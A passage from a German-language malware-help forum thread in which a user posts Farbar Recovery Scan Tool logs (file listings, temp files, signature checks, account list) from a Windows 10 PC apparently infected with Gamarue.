2017-06-08 09:08 - 2017-06-08 09:08 - 00002306 _____ C:\WINDOWS\System32\Tasks\RtHDVBg_Dolby
2017-06-08 09:08 - 2017-06-08 09:08 - 00002280 _____ C:\WINDOWS\System32\Tasks\RTKCPL
2017-06-08 09:08 - 2017-06-08 09:08 - 00002274 _____ C:\WINDOWS\System32\Tasks\DolbySelectorTask
2017-06-08 09:08 - 2017-06-08 09:08 - 00000000 ____D C:\WINDOWS\System32\Tasks\WPD
2017-06-08 09:08 - 2017-06-08 09:08 - 00000000 ____D C:\WINDOWS\System32\Tasks\Lenovo
2017-06-08 09:05 - 2017-06-08 09:05 - 00001519 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2017-06-08 09:01 - 2017-06-08 09:06 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate
2017-06-08 09:01 - 2017-06-08 09:01 - 00000000 ____D C:\Program Files\Common Files\SpeechEngines
2017-06-08 09:00 - 2017-07-04 21:38 - 02417936 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-06-08 09:00 - 2017-07-04 09:44 - 00000000 ____D C:\ProgramData\Synaptics
2017-06-08 09:00 - 2017-06-30 07:49 - 00000000 ____D C:\Users\ararat
2017-06-08 09:00 - 2017-06-08 09:07 - 00000000 ____D C:\Users\DefaultAppPool
2017-06-08 09:00 - 2017-06-08 09:00 - 02011386 _____ C:\WINDOWS\SysWOW64\PerfStringBackup.INI
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Vorlagen
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Startmenü
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Netzwerkumgebung
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Lokale Einstellungen
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Eigene Dateien
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Druckumgebung
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\Eigene Videos
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\Eigene Musik
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\Eigene Bilder
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\AppData\Local\Verlauf
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\AppData\Local\Anwendungsdaten
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Anwendungsdaten
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Vorlagen
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Startmenü
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Netzwerkumgebung
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Lokale Einstellungen
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Eigene Dateien
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Druckumgebung
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Documents\Eigene Videos
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Documents\Eigene Musik
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Documents\Eigene Bilder
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\AppData\Local\Verlauf
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\AppData\Local\Anwendungsdaten
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Anwendungsdaten
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WUDFUsbccidDriver_01_11_00.Wdf
2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_wbf_vfs_lvcmn_01_11_00.Wdf
2017-06-08 09:00 - 2017-05-01 22:51 - 06437312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll
2017-06-08 09:00 - 2017-05-01 22:51 - 02479552 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvc64.dll
2017-06-08 09:00 - 2017-05-01 22:51 - 01762752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvcr.dll
2017-06-08 09:00 - 2017-05-01 22:51 - 00548800 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshext.dll
2017-06-08 09:00 - 2017-05-01 22:51 - 00392312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmctray.dll
2017-06-08 09:00 - 2017-05-01 22:51 - 00146880 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\oemdspif.dll
2017-06-08 09:00 - 2017-05-01 22:51 - 00081856 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshextr.dll
2017-06-08 09:00 - 2017-05-01 22:51 - 00069752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvshext.dll
2017-06-08 09:00 - 2017-04-25 23:11 - 07944687 _____ C:\WINDOWS\system32\nvcoproc.bin
2017-06-08 08:59 - 2017-07-04 21:33 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2017-06-08 08:59 - 2017-07-04 09:44 - 00000000 ____D C:\ProgramData\NVIDIA
2017-06-08 08:59 - 2017-06-08 09:02 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
2017-06-08 08:59 - 2017-06-08 09:02 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2017-06-08 08:59 - 2017-06-08 09:01 - 00000000 ____D C:\Program Files\NVIDIA Corporation
2017-06-08 08:59 - 2017-06-08 09:01 - 00000000 ____D C:\Program Files\Intel
2017-06-08 08:59 - 2017-06-08 09:00 - 00000000 ____D C:\Program Files\Synaptics
2017-06-08 08:59 - 2017-06-08 08:59 - 00044875 _____ C:\WINDOWS\system32\Drivers\rtkhdasetting.zip
2017-06-08 08:59 - 2017-06-08 08:59 - 00000200 _____ C:\WINDOWS\system32\{EC94D02F-D200-4428-9531-05AF7F9799CB}.bat
2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_SynTP_01011.Wdf
2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_Smb_driver_Intel_01011.Wdf
2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____H C:\ProgramData\DP45977C.lfl
2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____D C:\WINDOWS\system32\DAX2
2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____D C:\Program Files\Realtek
2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 _____ C:\WINDOWS\system32\GfxValDisplayLog.bin
2017-06-08 08:59 - 2017-05-01 22:52 - 00001951 _____ C:\WINDOWS\NvContainerRecovery.bat
2017-06-08 08:59 - 2017-03-18 22:56 - 02233344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2017-06-08 08:59 - 2016-11-02 00:05 - 00099848 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.DLL
2017-06-08 08:58 - 2017-07-04 09:44 - 04916088 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-06-08 08:58 - 2017-07-04 09:40 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-06-05 22:24 - 2017-06-12 21:54 - 00000000 ___DC C:\WINDOWS\Panther
2017-06-05 10:50 - 2017-06-05 10:50 - 00257864 _____ (Lenovo Group Limited) C:\WINDOWS\system32\iMDriverHelper.dll
==================== Ein Monat: Geänderte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2017-07-04 21:38 - 2017-03-20 06:41 - 01067190 _____ C:\WINDOWS\system32\perfh007.dat
2017-07-04 21:38 - 2017-03-20 06:41 - 00247464 _____ C:\WINDOWS\system32\perfc007.dat
2017-07-04 21:38 - 2016-11-19 13:21 - 00136439 _____ C:\WINDOWS\system32\InstallUtil.InstallLog
2017-07-04 21:34 - 2017-03-18 23:03 - 00000000 ___HD C:\Program Files\WindowsApps
2017-07-04 21:34 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-07-04 21:33 - 2016-02-11 22:02 - 00000000 __SHD C:\Users\ararat\IntelGraphicsProfiles
2017-07-04 09:43 - 2017-03-18 13:40 - 00524288 _____ C:\WINDOWS\system32\config\BBI
2017-07-03 21:28 - 2016-03-27 18:17 - 00000000 ____D C:\Program Files\Common Files\Adobe
2017-07-03 21:28 - 2016-03-27 18:17 - 00000000 ____D C:\Program Files\Adobe
2017-07-03 21:28 - 2016-02-23 23:18 - 00000000 ____D C:\Program Files (x86)\Adobe
2017-07-03 21:28 - 2016-02-23 23:10 - 00000000 ____D C:\ProgramData\Adobe
2017-06-27 22:23 - 2016-02-23 22:19 - 00000000 ____D C:\Program Files (x86)\Dropbox
2017-06-27 21:00 - 2016-02-23 23:03 - 00000321 _____ C:\Users\ararat\Documents\BIMx_Export_Log.txt
2017-06-27 21:00 - 2016-02-23 23:03 - 00000000 ____D C:\Users\ararat\Graphisoft
2017-06-27 20:26 - 2016-02-23 23:03 - 00000000 ____D C:\Users\ararat\Documents\BIMx
2017-06-26 22:07 - 2016-02-20 13:26 - 00000000 ____D C:\Users\ararat\AppData\Roaming\Spotify
2017-06-26 22:07 - 2016-02-20 13:26 - 00000000 ____D C:\Users\ararat\AppData\Local\Spotify
2017-06-22 09:12 - 2016-02-23 22:22 - 00000000 ___RD C:\Users\ararat\Dropbox
2017-06-22 09:11 - 2016-10-25 19:04 - 00000000 ____D C:\Users\ararat\Documents\Tickets
2017-06-21 22:52 - 2017-03-18 23:01 - 00000000 ____D C:\WINDOWS\INF
2017-06-19 22:57 - 2016-02-23 22:19 - 00000000 ____D C:\Users\ararat\AppData\Local\Dropbox
2017-06-19 21:59 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\rescache
2017-06-15 19:05 - 2016-02-12 20:16 - 00000000 __RHD C:\Users\Public\AccountPictures
2017-06-14 22:12 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2017-06-14 22:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\oobe
2017-06-14 22:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\appraiser
2017-06-14 20:33 - 2016-02-11 21:55 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-06-14 20:32 - 2017-03-18 22:51 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-06-14 20:32 - 2016-02-11 21:55 - 133627792 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-06-14 20:22 - 2016-02-12 20:18 - 00002435 _____ C:\Users\ararat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-06-14 20:22 - 2016-02-12 20:18 - 00000000 ___RD C:\Users\ararat\OneDrive
2017-06-13 08:54 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\appcompat
2017-06-13 08:53 - 2016-02-12 20:16 - 00000000 ____D C:\Users\ararat\AppData\Local\Packages
2017-06-12 21:57 - 2016-09-17 15:35 - 00000000 ____D C:\Users\ararat\AppData\Roaming\Skype
2017-06-12 21:54 - 2017-03-18 23:03 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-06-08 09:58 - 2017-03-18 23:03 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template
2017-06-08 09:54 - 2017-03-18 23:06 - 00000000 ____D C:\WINDOWS\Setup
2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\system32\F12
2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ___RD C:\Program Files\Windows Defender
2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\ShellExperiences
2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Provisioning
2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-06-08 09:54 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Dism
2017-06-08 09:48 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI
2017-06-08 09:48 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\MUI
2017-06-08 09:48 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\inetsrv
2017-06-08 09:48 - 2017-03-18 22:59 - 00611840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqsnap.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00562176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqutil.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00261120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00204800 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisRtl.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00172544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisRtl.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00156160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqrt.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa.tlb
2017-06-08 09:48 - 2017-03-18 22:59 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa30.tlb
2017-06-08 09:48 - 2017-03-18 22:59 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa20.tlb
2017-06-08 09:48 - 2017-03-18 22:59 - 00054272 _____ (Microsoft Corporation) C:\WINDOWS\system32\admwprox.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00053248 _____ (Microsoft Corporation) C:\WINDOWS\system32\ahadmin.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\admwprox.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa10.tlb
2017-06-08 09:48 - 2017-03-18 22:59 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ahadmin.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisreset.exe
2017-06-08 09:48 - 2017-03-18 22:59 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisreset.exe
2017-06-08 09:48 - 2017-03-18 22:59 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\wamregps.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqcertui.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\cngkeyhelper.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisrstap.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wamregps.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cngkeyhelper.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisrstap.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00009096 _____ C:\WINDOWS\SysWOW64\msmqtrc.mof
2017-06-08 09:48 - 2017-03-18 22:56 - 01380352 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqqm.dll
2017-06-08 09:48 - 2017-03-18 22:56 - 00774144 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqsnap.dll
2017-06-08 09:48 - 2017-03-18 22:56 - 00564224 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqutil.dll
2017-06-08 09:48 - 2017-03-18 22:56 - 00305664 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa.dll
2017-06-08 09:48 - 2017-03-18 22:56 - 00222720 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqrt.dll
2017-06-08 09:48 - 2017-03-18 22:56 - 00177664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mqac.sys
2017-06-08 09:48 - 2017-03-18 22:56 - 00125440 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqlogmgr.dll
2017-06-08 09:48 - 2017-03-18 22:56 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa.tlb
2017-06-08 09:48 - 2017-03-18 22:56 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa30.tlb
2017-06-08 09:48 - 2017-03-18 22:56 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa20.tlb
2017-06-08 09:48 - 2017-03-18 22:56 - 00051712 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqbkup.exe
2017-06-08 09:48 - 2017-03-18 22:56 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa10.tlb
2017-06-08 09:48 - 2017-03-18 22:56 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqsvc.exe
2017-06-08 09:48 - 2017-03-18 22:56 - 00018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqcertui.dll
2017-06-08 09:48 - 2017-03-18 22:56 - 00009096 _____ C:\WINDOWS\system32\msmqtrc.mof
2017-06-08 09:17 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\USOPrivate
2017-06-08 09:13 - 2016-09-24 14:37 - 00000000 ____D C:\Program Files (x86)\SunplusIT Integrated Camera
2017-06-08 09:11 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows NT
2017-06-08 09:10 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase
2017-06-08 09:10 - 2017-03-18 13:40 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
2017-06-08 09:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Registration
2017-06-08 09:09 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-06-08 09:09 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated
2017-06-08 09:08 - 2017-03-20 06:43 - 00000000 ____D C:\WINDOWS\HoloShell
2017-06-08 09:08 - 2017-03-18 23:03 - 00000000 __RSD C:\WINDOWS\Media
2017-06-08 09:08 - 2017-03-18 23:03 - 00000000 __RHD C:\Users\Public\Libraries
2017-06-08 09:08 - 2016-02-12 19:33 - 00023056 _____ C:\WINDOWS\system32\emptyregdb.dat
2017-06-08 09:06 - 2017-05-18 08:30 - 00000000 ____D C:\WINDOWS\system32\UNP
2017-06-08 09:06 - 2017-05-01 17:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Rhinoceros 5
2017-06-08 09:06 - 2016-07-14 22:45 - 00000000 ___SD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OpenOffice 4.1.2
2017-06-08 09:06 - 2016-07-09 22:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2017-06-08 09:06 - 2016-04-21 18:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Autodesk 3ds Max 2015
2017-06-08 09:06 - 2016-04-21 18:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Autodesk
2017-06-08 09:06 - 2016-03-23 19:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScummVM
2017-06-08 09:06 - 2016-02-23 22:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WibuKey
2017-06-08 09:06 - 2016-02-23 22:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CodeMeter
2017-06-08 09:06 - 2016-02-23 22:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GRAPHISOFT
2017-06-08 09:06 - 2016-02-23 22:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2017-06-08 09:06 - 2016-02-21 19:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client
2017-06-08 09:06 - 2016-02-21 13:51 - 00000000 ____D C:\Users\ararat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-06-08 09:06 - 2016-02-21 13:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-06-08 09:06 - 2016-02-13 16:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SRWare Iron (64-Bit)
2017-06-08 09:06 - 2016-02-12 20:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dolby
2017-06-08 09:06 - 2016-02-11 22:02 - 00000000 ____D C:\WINDOWS\SysWOW64\NV
2017-06-08 09:06 - 2016-02-11 22:02 - 00000000 ____D C:\WINDOWS\system32\NV
2017-06-08 09:05 - 2015-10-30 08:28 - 00000000 ____D C:\Users\Default.migrated
2017-06-08 09:02 - 2017-05-28 09:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2017-06-08 09:02 - 2017-03-20 06:42 - 00000000 ____D C:\WINDOWS\OCR
2017-06-08 09:02 - 2017-03-20 06:41 - 00000000 ____D C:\WINDOWS\SysWOW64\sysprep
2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 __SHD C:\Program Files (x86)\Windows Sidebar
2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\IME
2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\spool
2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\NDF
2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\IME
2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\schemas
2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2017-06-08 09:02 - 2017-03-13 19:32 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Itoo Software
2017-06-08 09:02 - 2016-11-15 23:08 - 00000000 ___HD C:\WINDOWS\system32\WLANProfiles
2017-06-08 09:02 - 2016-10-22 10:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexicon
2017-06-08 09:02 - 2016-10-22 09:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IK Multimedia
2017-06-08 09:02 - 2016-07-15 17:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lenovo
2017-06-08 09:02 - 2016-05-07 11:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Intel
2017-06-08 09:02 - 2016-04-21 21:04 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Chaos Group
2017-06-08 09:02 - 2016-04-21 18:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Autodesk Backburner 2015
2017-06-08 09:02 - 2016-02-12 20:24 - 00000000 ____D C:\WINDOWS\SysWOW64\sda
2017-06-08 09:02 - 2016-02-11 22:02 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2017-06-08 09:01 - 2017-03-18 23:03 - 00000000 __SHD C:\Program Files\Windows Sidebar
2017-06-08 09:01 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\inetsrv
2017-06-08 09:01 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2017-06-08 09:01 - 2017-03-13 19:32 - 00000000 ____D C:\Users\ararat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Itoo Software
2017-06-08 09:00 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2017-06-08 09:00 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Help
2017-06-08 09:00 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2017-06-08 08:59 - 2016-02-11 20:23 - 00000000 ____D C:\Intel
2017-06-04 11:47 - 2016-10-16 17:44 - 00000000 ____D C:\Users\ararat\Documents\Wohnung
==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======
2016-08-02 21:46 - 2017-04-03 21:08 - 0000132 _____ () C:\Users\ararat\AppData\Roaming\Adobe PNG Format CS6 Prefs
2016-11-04 00:45 - 2017-03-10 23:52 - 0001456 _____ () C:\Users\ararat\AppData\Local\Adobe Save for Web 13.0 Prefs
2017-07-04 09:44 - 2017-07-04 09:44 - 0000000 ____H () C:\ProgramData\cm-lock
2017-06-08 08:59 - 2017-06-08 08:59 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
Einige Dateien in TEMP:
====================
2017-06-27 22:40 - 2017-03-18 22:58 - 0830464 _____ (Microsoft Corporation) C:\Users\ararat\AppData\Local\Temp\cdo3360657184.dll
2017-06-26 21:53 - 2017-03-18 22:58 - 0830464 _____ (Microsoft Corporation) C:\Users\ararat\AppData\Local\Temp\cdo738377283.dll
==================== Bamital & volsnap ======================
(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert
LastRegBack: 2017-07-03 01:25
==================== Ende von FRST.txt ============================
|
|
04.07.2017, 20:52
| #13 |
| | Windows 10 - Gamarue Immernoch Schritt 3: Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 03-07-2017 01
durchgeführt von ararat (04-07-2017 21:42:21)
Gestartet von C:\Users\ararat\Desktop
Windows 10 Pro Version 1703 (X64) (2017-06-08 07:11:14)
Start-Modus: Normal
==========================================================
==================== Konten: =============================
Administrator (S-1-5-21-3349751938-1204465652-1694021483-500 - Administrator - Disabled)
ararat (S-1-5-21-3349751938-1204465652-1694021483-1000 - Administrator - Enabled) => C:\Users\ararat
DefaultAccount (S-1-5-21-3349751938-1204465652-1694021483-503 - Limited - Disabled)
Gast (S-1-5-21-3349751938-1204465652-1694021483-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3349751938-1204465652-1694021483-1002 - Limited - Enabled)
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
